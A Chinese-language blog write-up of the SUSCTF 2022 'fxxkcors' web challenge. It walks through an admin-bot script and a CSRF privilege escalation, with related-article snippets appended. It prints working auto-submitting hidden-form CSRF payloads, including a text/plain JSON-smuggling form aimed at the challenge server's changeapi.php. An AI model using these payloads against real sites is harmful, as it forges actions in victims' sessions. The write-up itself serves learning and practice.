[SUSCTF2022]fxxkcors

最新推荐文章于 2022-09-14 17:56:45 发布
最新推荐文章于 2022-09-14 17:56:45 发布
阅读量428 收藏
点赞数
分类专栏: ctf 文章标签: 后端 php 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/123207586
版权

1NDEX

0x00 前言

由于题目名字的关系一开始只想着是cors漏洞了
这个一开始雀氏没接触过
所以就一直在研究 当然最后证实只是一个csrf…
看看大佬的文章扫扫盲
CORS跨域漏洞的学习
(freebuff这篇讲的比较通透
cors安全完全指南
拾人牙慧一下
重点就是服务器返回响应包的头
Access-Control-Allow-Origin : 允许访问的源有哪些 对应请求包中的origin头
Access-Control-Allow-Credentials :是否允许带上cookie访问资源

题目附件一个js
一开始以为report那的三个url真是用来报告bug的… 没想到就是配着js看的
很像portswigger的oauth靶场
模拟admin登录并点击url

const opt = {
    name: "fxxkcors",
    router: "fxxkcors",
    site: process.env.FXXK_SITE ?? "",

}

const delay = (ms) => new Promise((resolve) => setTimeout(resolve, ms))

const visit = async (browser, url) =>{
    let site = process.env.FXXK_SITE ?? ""
    console.log(`[+]${opt.name}: ${url}`)
    let renderOpt = {...opt}
    try {
        const loginpage = await browser.newPage()
        await loginpage.goto(site)
        await loginpage.type("input[name=username]", "admin")
        await loginpage.type("input[name=password]", process.env.FXXK_ADMIN_PASS ?? "")
        await Promise.all([
            loginpage.click('button[name=submit]'),
            loginpage.waitForNavigation({waitUntil: 'networkidle0', timeout: 2000})
        ])
        await loginpage.goto("about:blank")
        await loginpage.close()

        const page = await browser.newPage()
        await page.goto(url, {waitUntil: 'networkidle0', timeout: 2000})

        await delay(2000) /// waiting 2 second.
        console.log(await page.evaluate(() =>  document.documentElement.outerHTML))

    }catch (e) {
        console.log(e)
        renderOpt.message = "error occurred"
        return renderOpt
    }
    renderOpt.message = "admin will view your report soon"
    return renderOpt
}

module.exports = {
    opt:opt,
    visit:visit
}

在题目多个地方截包都没看到Access-Control-Allow-*的返回头…
就意识到不对劲
不过csrf考察的并不是很多

0x01 brain.md

一个简易的loginpage
任意用户都能直接注册并登录(除了admin
在这里插入图片描述
随便搞个用户
只有normal admin能看到flag
在这里插入图片描述

进主页之后看到这里还是比较显眼的
注意… 定语从句
u want the person to be an normal admin
在这里插入图片描述
当然我们肯定自己没权限
拦一下看到json
在这里插入图片描述
在这里插入图片描述
另一个report界面
显然是让我们贴url的
在这里插入图片描述
补充一下一篇写的很好的csrf

csrf浅谈

讓我們來談談 CSRF

我们的目的就是要admin账户帮我们向changeapi.php post我们自己的账号
那么刚好就能用到跨站域请求伪造
当然再回头看一下我们post的包,发现这像敏感操作并没有携带token校验
这也证实了这是个可利用点

当我们需要发送post请求时,就可以利用表单的方式

iframe直接内联框架嵌入 并且不做展示
再通过js自动提交 不知不觉中触发表单

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='https://small-min.blog.com/delete' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='id' value='3'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

form中的target属性指定了在不做显示的iframe中打开action的url,所以表面上不会产生任何变化

開一個看不見的 iframe,讓 form submit 之後的結果出現在 iframe 裡面,而且這個 form 還可以自動 submit,完全不需要任何操作。
关于iframe和form的联用
在这里插入图片描述

若用json传输

<form action="https://small-min.blog.com/delete" method="post" enctype="text/plain">
<input name='{"id":3, "ignore_me":"' value='test"}' type='hidden'>
<input type="submit"
  value="delete!"/>
</form>

這樣子會產生如下的 request body:

{ “id”: 3,
“ignore_me”: “=test”
}

第二个键值对ignore_me是为了规避 = 号的干扰

但這邊值得注意的一點是,form能夠帶的 content type
只有三種:application/x-www-form-urlencoded, multipart/form-data 跟
text/plain。在上面的攻擊中我們用的是最後一種,text/plain,如果你在你的後端 Server 有檢查這個 content
type 的話,是可以避免掉上面這個攻擊的。

回到题目中
有了上述的铺垫,我们就可以直接在VPS构造恶意页面

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://124.71.205.122:10002/changeapi.php' target="csrf-frame" id="csrf-form" enctype="text/plain">
  <input type='hidden' name='{"username":"kidult", "abc":"' value='123"}'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
这里有个小坑

当使用iframe跨域提交表单时会触发浏览器安全策略造成cookie丢失
iframe 跨域访问session/cookie丢失问题解决方法
iframe 跨域传递 cookie

比赛环境下 我们要去掉iframe

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://124.71.205.122:10002/changeapi.php'  id="csrf-form" enctype="text/plain">
  <input type='hidden' name='{"username":"kidult", "abc":"' value='123"}'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

在这里插入图片描述

0x02 rethink

自己挖的坑自己填

k_du1t
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
配置不安全CORS基础原理(Cross-origin resource sharing)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
02-20 2463
配置不安全CORS基础原理(Cross-origin resource sharing) 文章目录配置不安全CORS基础原理(Cross-origin resource sharing)什么是跨域资源共享(CORS)?对于实现同源策略跨源资源共享漏洞利用如何防止基于 CORS 的攻击正确配置跨域请求只允许受信任的站点避免将 null 列入白名单避免在内部网络中使用通配符CORS 不能替代服务器端安全策略 什么是跨域资源共享(CORS)? 对于实现 前端对应于前端请求来说CORS通信与同源的AJAX通信没有差
[SUSCTF]fxxkcors(CSRF提权)
Landasika的博客
05-17 324
首先注册登陆后发现 审计changepermission中的源码可以发现 这个地方需要我们提交一个usename的js表单进行用户提权, 根据题目的意思,我们需要提权之后才能看到flag。 首先用bp直接提交表单试试,结果发现这个地方需要admin的用户才能提权,那么我们需要进行CSRF让服务器给我们提权。 再分析report界面的js代码 const opt = { name...
CTF练习(2)-what a fuck!这是什么鬼东西?(js)
qq_35097943的博客
03-19 1979
一、打开题目链接 http://www.shiyanbar.com/ctf/56 1.看到一串不规则符号 根本不知道这是啥。。。
ctfIDF实验室Fuck your brain
灵感点滴的分享
11-25 2122
Fuck your brain 2015-01-07 23:51:50 作者:cumirror 108514 这是什么,你能理解它吗? ++++++++++++[>++++>+++++>++++++>+++++++>++++++++>+++++++++>++++++++++>>>+++.---.>>>+++.>>++++++.>>>>----.>>>+++.>---.>+
CTF基础-MISC篇
Sn1P3r的博客
09-13 3万+
编码是什么?   编码是信息从一种形式或格式转换为另一种形式的过程,也称为计算机 编程语言的代码简称编码。 用预先规定的方法将文字、数字或其它对象编成数码,或将信息、数据 转换成规定的电脉冲信号。   编码在电子计算机、电视、遥控和通讯等方面广泛使用。编码是信息从 一种形式或格式转换为另一种形式的过程。解码,是编码的逆过程。  Morse编码   摩尔斯电码(Morse code...
CTF密码学常见加解密总结
热门推荐
攀登
03-10 6万+
                                                CTF密码学总结之前拜读了各路大神关于密码学的文章,讲解的十分透彻,感觉顿时领悟。但是后来需要用时,脑子里一片空白,空白,白,白,白......所以写篇文章以记之,以免再次忘记23333。废话少说,上正文。1.base64编码     Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,b...
CTF——实验吧(web总结1.1)
加载中...
10-19 1万+
地址:http://www.shiyanbar.com/ctf/practice 一、你能跨过去吗题目:?,你是在问我吗???你是在怀疑我的能力吗??? 解题链接: http://ctf1.shiyanbar.com/basic/xss/ 思路: 1、发现所给字串中有%+数字,怀疑使用escape加密了url,使用站长工具http://tool.chinaz.com/Tools/Escape.
SUSCTF 2022 Crypto复现
最新发布
M3ng@L的博客
09-14 1117
AnalysisAnalysisAnalysis 简答来说,题目中函数生成了一个实数矩阵A\pmb{A}AA,并且大小为;由以单个字符构成的大小的矩阵X\pmb{X}XX;由矩阵乘法B=AX\pmb{B}=\pmb{A}\pmb{X}BB=AAXX,生成结果矩阵b\pmb{b}bb;已知量有实数矩阵A\pmb{A}AA,以及结果矩阵B\pmb{B}BB我们已知矩阵乘法中的一个乘数矩阵以及结果矩阵,那么可以计算X=AB\pmb{X}=\pmb{A} \pmb{B}XX=AABB,得到矩阵X\pmb{X}XX;
spring could 微服务解决跨域问题cors
fuck487的博客
11-02 2098
1、普通spring mvc项目 @Configuration public class CorsConfig { @Bean public CorsFilter corsFilter() { final UrlBasedCorsConfigurationSource source = new UrlBasedCorsConfigurationSource()...
portswigger CORS
qq_53755216的博客
07-21 560
写在前面 最近忙于复现比赛 今天来学点新知识 昨天做ctfshow的 cms 时 了解到了 有 Flash 的一个洞 和 cors 有关 今天来深入学习一下和cors有关的知识 start 什么是CORS? 跨域资源共享 (CORS) 是一种浏览器机制,可以对位于给定域之外的资源进行受控访问。它扩展并增加了同源策略 ( SOP ) 的灵活性。但是,如果网站的 CORS 策略配置和实施不当,它也会为基于跨域的攻击提供可能性。CORS 不是针对跨站请求伪造(CSRF)等跨源攻击的保护措施。 Same-ori
CORS跨域漏洞的学习
CanMeng'Blog - 一个WEB安全渗透的技术爱好者
07-27 8281
学习CORS的漏洞和相关的一些知识梳理,网站如果存在这个漏洞就会有用户敏感数据被窃取的风险。 0x00 从浏览器的同源策略说起 SOP,同源策略 (Same Origin Policy),该策略是浏览器的一个安全基石,如果没有同源策略,那么,你打开了一个合法网站,又打开了一个恶意网站。恶意网站的脚本能够随意的操作合法网站的任何可操作资源,没有任何限制。 (图片来自网络) ...
CTF-web Xman-2018 第五天 xss csrf
iamsongyu的博客
12-15 1345
xss常见套路 对于xss,实际上就是把我们提交上去的数据当做代码执行,对于这种实际上有很多种情况可以攻击,下面具体介绍一些常用的套路。 先看一些小trik 很多HTML标记中的属性都支持javascript:[code]伪协议的形式. &lt;table background="javascript:alert(/xss/)"&gt;&lt;/table&gt; &lt;img src=...
CORS跨域资源共享漏洞
谢公子的博客
01-16 1万+
目录 CORS跨域资源共享 简单跨域请求 非简单请求 CORS的安全问题 有关于浏览器的同源策略和如何跨域获取资源,传送门——>浏览器同源策略和跨域的实现方法 同源策略(SOP)限制了应用程序之间的信息共享,并且仅允许在托管应用程序的域内共享。这有效防止了系统机密信息的泄露。但与此同时,也带来了另外的问题。随着Web应用程序和微服务使用的日益增长,出于实用目的往往需要将信息从一...
【41】WEB安全学习----CORS跨域安全
尚未佩妥剑 转眼便江湖
10-26 496
CORS CORS需要浏览器和服务器同时支持,目前,IE浏览器不能低于IE10。对于开发者来说,CORS通信与同源的AJAX通信没有差别,代码完全一样。浏览器一旦发现AJAX请求跨源,就会自动添加一些附加的头信息,有时还会多出一次附加的请求,但用户不会有感觉。 因此,实现CORS通信的关键是服务器。只要服务器实现了CORS接口,就可以跨源通信。浏览器将CORS请求分成两类: 简单请求:发出COR...
如何实现一个安全的Web登陆
ReZero's Blog
10-14 4586
综述:待 Update:QUIC, SSO, HSTS等协议研究,SHA-1 可破解总结: 没有绝对的安全,能不自己做就不自己做, 要么 openID(不了解), 要么OAuth(推荐QQ & Github)本文不考虑键盘记录器等养毒行为, 本文不考虑堆栈溢出, exploit, SQL注入等。 单纯谈论偏向登陆会话过程思维养成key: 时间, 信任无解问题: CSRF, 中间人攻击(有应对方案,但
Cors漏洞详解
Askshhbs的博客
04-26 9669
Cors介绍 Cors全称"跨域资源共享"(Cross-origin resource sharing),Cors的出现是用来弥补SOP(同源策略)的不足。在当时SOP有些限制了网页的业务需求,不能够使不同域的网页互相访问,因此提出了Cors:用于绕过SOP(同源策略)来实现跨域资源访问的一种技术。 Cors漏洞就是攻击者利用Cors技术来获取用户的敏感数据,从而导致用户敏感信息泄露。 漏洞原理 Cors请求可分为两类,简单请求和非简单请求。所谓简单请求,就是请求方式为GET,POST,HEAD这三
2016xctf一道ctf题目
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
CTF常见编码及加解密(超全)
RuoLi_s的博客
11-19 1万+
title: CTF常见编码(超全) author: ruoli tags: ctf 编码 密码 安全 categories: MISC summary: 这是整理的最全的ctf常见加解密,以及编码,不看后悔!! abbrlink: a36c date: 2020-11-18 08:32:39 前言 ​ 最近打了场ctf,真的是被各种编码以及加密方式给搞怕了,所以,今天就来整理一下ctf中常见的编码,顺便给这次比赛做一个总结。 常见CTF编码及加解密 补充 计算机中的数据都是按字节存储。一个字节(.
CTF 实验吧 what a fuck!这是什么鬼东西
The Road Of Sec
10-17 1478
1.进去后发现 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值